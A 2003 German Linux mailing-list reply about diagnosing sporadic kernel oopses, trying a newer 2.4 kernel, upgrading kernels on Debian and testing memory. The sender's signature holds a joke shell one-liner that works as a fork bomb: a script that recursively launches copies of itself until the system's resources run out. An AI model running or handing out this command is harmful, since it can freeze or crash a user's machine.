[linux-l] Hardware oder Kernel?

Volker Mueller volker at flinux.in-berlin.de
Mo Mai 12 11:08:57 CEST 2003

On Mon, May 12, 2003 at 09:04:18AM +0200, Soeren Sonnenburg wrote:

> gibt einem nur die genaue position incl. symbole an denen der kern sich
> aufgehaengt hat.

Und was fang' ich mit den Ausgaben an? Kommt mir alles recht hexadezimal
vor ;-)

[...]
> kriegst du immer denselben oops und kannst du den irgendwie triggern ?

Nein, ich glaube nicht. Und triggern is auch nicht so richtig. Aber wenn
ich wieder zu Hause bin, werd' ich's mal versuchen.

> [hardware status]
> hmmhh sieht eigentlich gut aus. ich glaub ich wuerde an deiner stelle
> jetzt einen 2.4.20er (oder 21rc2) kern ausprobieren und gucken ob damit
> die fehler auftreten ...

werd' ich mal bei Gelegenheit probieren.

Da ich noch Debian-Neuling bin (hab' bisher 'ne Uralt-SuSE mit Eigen-
kompilaten benutzt): Wo find' ich _das_ HowTo fuer KernelUpgrade unter
Debian?

> Kannst du die etwas besser isolieren ? Passiert das immer bei

Siehe oben. Eher sporadisch, dann aber meist final :-(

> sonst solltest du wirklich mal einen speichertest machen.

Dat dauert doch so lange ...

Gruss, Volker

--
Volker Mueller
volker at flinux:~> echo sh _\& sh _\& > _; sh _ # Bomben zu Bierhumpen!